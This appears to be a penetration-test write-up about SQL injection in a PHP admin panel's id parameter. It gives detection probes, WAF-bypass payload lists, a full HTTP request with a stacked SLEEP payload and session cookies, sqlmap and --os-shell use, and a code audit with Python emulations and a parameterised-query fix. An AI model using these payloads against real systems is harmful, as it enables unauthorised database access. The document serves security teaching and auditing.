1. Backend - SQL injection vulnerability (1)


Preface

In the vast field of software and application testing, black-box and white-box testing are the two core methods; each brings its own perspective to the quality assurance of web applications. Black-box testing focuses on functional verification, while white-box testing goes into the code itself to confirm the logic is correct. This article explores how to combine the two effectively, using as the worked case a callback system whose assets were exposed to the public internet.

The theoretical bases of black-box and white-box testing come from analysing software functions and internal structure respectively. Black-box testing, like an uninformed user, judges the software solely by its inputs and outputs. White-box testing scrutinises every line of code by checking the program's logical paths, data flows, parameters and how they are used.

Preparation

To reduce the effort of manual auditing, tools can take over part of the work.

Firstly:

Seay Source Code Audit System is an open-source code audit tool that has received extensive attention and use by security professionals. It can help developers and security personnel quickly discover potential security vulnerabilities in web applications, including SQL injection, cross-site scripting (XSS), file inclusion, and other common vulnerabilities.


Secondly:

Fortify is a powerful static code analysis tool developed and maintained by Micro Focus. It can help developers and security teams comprehensively scan the source code of applications, discover various security vulnerabilities, including injection attacks, cross-site scripting, access control defects, and so on.



1. Backend - SQL injection vulnerability (1)

The methods for judging SQL injection mainly include the following:

  1. Numeric injection: when the parameter is treated as an integer (for example id=1), there may be a numeric injection point. Append boolean conditions and compare the responses: send id=1 and 1=1 and then id=1 and 1=2. If the first returns the normal page and the second does not, the condition is being evaluated by the database.
  2. Character-based injection: when the value lands inside a quoted string literal, a lone quote (admin') should break the query, and a true/false pair such as admin' and '1'='1 against admin' and '1'='2 (the application's own closing quote completes the last literal) should produce different results. If the results differ, there is probably character-based injection.
  3. Other types of injection: besides numeric and character-based injection there are search-based (LIKE) injection, Cookie injection, POST-body injection and so on. These differ in where the value lands in the query or the request, not in the detection logic.

Of course, early on you may run into awkward environments, where certain characters or symbols are filtered or a WAF sits in front of the application. Then you can try a few tricks to dig out the hidden treasure, using whatever means you prefer or some recently disclosed bypass syntax:

  1. Bypassing condition checks using logical operators (no spaces around the keyword, so a space-delimited keyword rule does not match):

    • For example, 'or'1'='1, 'or'a'='a
  2. Bypassing condition checks using arithmetic operators:

    • For example, '+'1'='1, '*'1'='1
  3. Bypassing condition checks using string comparison and character functions:

    • For example, 'and'str'='str', 'and chr(97)='a
  4. Bypassing keyword filters using comment symbols (an inline comment replaces the space; the /*!50000 ... */ form is a MySQL version-conditional comment that MySQL executes and other engines ignore):

    • For example, '/**/and/**/1=1, '/*!50000and*/1=1
  5. Bypassing filters that match the literal quote by URL (percent) encoding it, %27 being the encoded single quote:

    • For example, %27and%27g%27=%27f, %27or%271%27=%271
  6. Bypassing condition checks using double negation (the trailing fragment re-balances the application's closing quote):

    • For example, 'and not('g'='f')and'1'='1, 'and not(1=2)and'1'='1
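The detection logic from the first list and the first, fourth and sixth bypass families above, replayed against a stand-in for the vulnerable page. This is an added example, not code from the original article or from the audited system: the admin table, the concatenated query shape and the keyword-filter "WAF" are constructed assumptions (the page only shows that a bare quote produced an error and that the ' and 'g'='f pair worked), and SQLite is used so it runs offline. The MySQL-only /*!50000and*/ form is left out because SQLite does not execute conditional comments.

```python
import re
import sqlite3

# Constructed stand-in for the app's admin table; the real schema is not shown on the page.
SCHEMA = """
CREATE TABLE admin (id INTEGER PRIMARY KEY, name TEXT, adminStatus INTEGER);
INSERT INTO admin VALUES (1, 'root', 1), (2, 'ops', 0), (3, 'audit', 0);
"""

# Hypothetical naive WAF rule: space-delimited boolean keywords and comment terminators.
NAIVE_WAF = re.compile(r"\s(and|or)\s|--|#", re.IGNORECASE)


def vulnerable_lookup(id_param, waf=None):
    """Emulates admininfo.php?id=<value>: the raw value is spliced into a quoted
    string literal (the shape implied by the bare-quote error seen on the page).
    Returns (status, rows) with status 'ok', 'error' or 'blocked'."""
    if waf is not None and waf.search(id_param):
        return "blocked", []
    sql = f"SELECT id, name FROM admin WHERE id='{id_param}'"
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:  # a broken literal surfaces here, like the app's error page
        return "error", [str(exc)]
    finally:
        conn.close()


def detect_string_injection(lookup, base="1"):
    """Character-based detection: a lone quote should change the status, and a
    true/false pair that only parses inside a string literal should change the
    result set. The app's own closing quote completes each payload."""
    quote_status, _ = lookup(base + "'")
    t_status, t_rows = lookup(base + "'and'g'='g")
    f_status, f_rows = lookup(base + "'and'g'='f")
    return {
        "quote_breaks_query": quote_status == "error",
        "boolean_differential": t_status == f_status == "ok" and t_rows != f_rows,
    }


# The same true condition written once per bypass family from the list above.
BYPASS_PAYLOADS = {
    "spaced":          "1' and 'g'='g",                # plain form, caught by the keyword rule
    "no_space":        "1'and'g'='g",                  # logical operator with no spaces
    "comment_split":   "1'/**/and/**/'g'='g",          # inline comments stand in for spaces
    "double_negation": "1'and not('g'='f')and'x'='x",  # NOT(...) plus a tail that re-balances the quote
}


def bypass_report(waf=NAIVE_WAF):
    """For each payload: does the filter stop it, and if not, does the row still come back?"""
    report = {}
    for name, payload in BYPASS_PAYLOADS.items():
        status, rows = vulnerable_lookup(payload, waf)
        names = [row[1] for row in rows] if status == "ok" else []
        report[name] = (status, names)
    return report


if __name__ == "__main__":
    print(detect_string_injection(vulnerable_lookup))
    for name, result in bypass_report().items():
        print(f"{name:16s} {result}")
```

Running it shows both detection signals firing against the concatenated query, the spaced payload being blocked by the keyword rule, and the three reshaped payloads passing the filter while still selecting the root row: a keyword filter changes the spelling of the payload, not the vulnerability.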

Back to the main thread: this callback system is written in plain PHP, which keeps development simple, but here it is too simple. After logging into the backend and clicking through the functions at random, nothing stood out, until the edit function turned something up!

/admin/admininfo.php?id=1


Almost every list's edit/modify function turned out to take an id parameter in the same way, for example:

/admin/codeinfo.php?id=1


Then, let's get to work. Under 'Site Management', the site-administrator edit page 'admininfo.php' threw a database error as soon as a single quote (') was appended to id. This is the classic first check: quick and convenient!


GET /admin/admininfo.php?id=1'and'g'='f';SELECT SLEEP(5)# HTTP/1.1
Host: XXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: 1869f3da4f51f3cf057e5e1bfb43dfd2_ssl=1b634fc0-33c5-426d-b012-f4a8ab259f96.BihvnNQt-PttnGjOcnQU8ojbcew; 68c64d273cd94dc60d1a176456542de8_ssl=f7fd524a-8e31-4d3a-8ca7-308172377b35.jzPNyFewCgYPy6oPzK0ieM7MWCs; PHPSESSID=tqi04ejqhrs063k32u92a6lrmq
Priority: u=1
Referer: http://XXXXXXXXXX/admin/webset.php
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip



A stacked-query, time-based blind injection (the ;SELECT SLEEP(5)# tail in the request above delayed the response by five seconds). I handed it to sqlmap, hoping it would not take too long. OK, a few minutes and it was done! Not much time left.


I wanted to use sqlmap --os-shell to write a shell, but the database account did not have enough privileges, so that was a dead end.

SQL injection - code audit

require_once '../includes/common.php'; // include path assumed; the extracted page showed a rewritten URL here
if ($adminData['adminStatus'] != 1) Tips::error('You do not have permission to access this page', '/admin');
if (empty($_GET['id'])) Tips::error('Parameter error', '/admin/adminlist.php');
// Loose (==) comparison against the integer 1: an access-control guard, not input validation
if ($_GET['id'] == 1 && $adminData['id'] != 1) Tips::error('Cannot modify the chief site administrator', '/admin/adminlist.php');

$id = $_GET['id'];                      // raw query-string value: no cast, no whitelist, no escaping
$editData = $adminClass->GetAdmin($id); // sink: the value reaches the SQL query unchanged

if (empty($editData)) Tips::error('The site administrator does not exist', '/admin/userlist.php');
if ($editData['adminStatus'] == 1 && $editData['id'] != $adminData['id'] && $adminData['id'] != 1) Tips::error('Cannot modify a same-level site administrator', '/admin/adminlist.php');


The variable $_GET['id'] is taken straight from the URL with no validation or filtering whatsoever; the only checks are emptiness and a loose comparison with 1, neither of which constrains the value. $id is then passed unchanged to $adminClass->GetAdmin($id), and following GetAdmin leads to \includes\class\admin.class.p
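The audited pattern and its fix side by side, with the black-box probes from earlier replayed against each. This is an added example, not code from the original article or from the audited system: GetAdmin's body is not shown on the page, so the concatenated query shape is assumed from the bare-quote error, the admin table is constructed, and the whole thing is modelled in Python on SQLite so it runs stand-alone. The same two layers apply in the PHP code (cast or validate $_GET['id'] as an integer, then use a PDO/mysqli prepared statement).

```python
import sqlite3

# Constructed stand-in for the app's admin table (assumed schema; the page shows only the caller).
SCHEMA = """
CREATE TABLE admin (id INTEGER PRIMARY KEY, name TEXT, adminStatus INTEGER);
INSERT INTO admin VALUES (1, 'root', 1), (2, 'ops', 0);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_admin_vulnerable(conn, id_param):
    """The audited pattern: the raw query-string value is spliced into the SQL text.
    Concatenation into a quoted literal is assumed from the page's bare-quote error."""
    sql = f"SELECT id, name, adminStatus FROM admin WHERE id='{id_param}'"
    return conn.execute(sql).fetchall()


def get_admin_bound(conn, id_param):
    """Fix, layer 1: bind the value as a parameter. Whatever the string contains,
    it is compared against id as data and never parsed as SQL."""
    return conn.execute(
        "SELECT id, name, adminStatus FROM admin WHERE id=?", (id_param,)
    ).fetchall()


def get_admin_validated(conn, id_param):
    """Fix, layer 2: the page's own checks (empty(), == 1) are not validation.
    Require a decimal integer up front, reject loudly otherwise, then still bind."""
    if not isinstance(id_param, str) or not id_param.isdigit():
        raise ValueError("Parameter error: id must be a positive integer")
    return conn.execute(
        "SELECT id, name, adminStatus FROM admin WHERE id=?", (int(id_param),)
    ).fetchall()


def probe(lookup):
    """Replay the black-box probes against one implementation: a legitimate id,
    a bare quote, and the true/false pair. Returns {name: (status, rows)}."""
    conn = open_db()

    def run(value):
        try:
            return "ok", lookup(conn, value)
        except ValueError:
            return "rejected", []
        except sqlite3.Error:
            return "error", []

    try:
        return {
            "legit": run("1"),
            "quote": run("1'"),
            "true": run("1'and'g'='g"),
            "false": run("1'and'g'='f"),
        }
    finally:
        conn.close()


def is_injectable(lookup):
    """True when the bare quote breaks the query or the true/false pair differs."""
    r = probe(lookup)
    return r["quote"][0] == "error" or r["true"][1] != r["false"][1]


if __name__ == "__main__":
    for name, fn in [("vulnerable", get_admin_vulnerable),
                     ("bound", get_admin_bound),
                     ("validated", get_admin_validated)]:
        print(f"{name:10s} injectable={is_injectable(fn)} probes={probe(fn)}")
```

Binding alone already removes both signals: the quote no longer errors and the true/false pair both return nothing, because the whole string is compared against id as a value. Adding the integer check on top turns a malformed id into an explicit "Parameter error" in the style the page already uses, instead of silently returning an empty result, which is the better failure mode for an admin page.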
